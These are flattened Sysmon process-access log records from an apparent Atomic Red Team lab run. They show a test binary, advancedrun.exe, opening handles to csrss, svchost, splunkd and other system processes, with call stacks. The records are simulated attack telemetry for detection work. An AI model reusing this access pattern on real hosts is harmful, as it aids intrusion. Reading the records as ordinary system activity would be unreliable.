17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 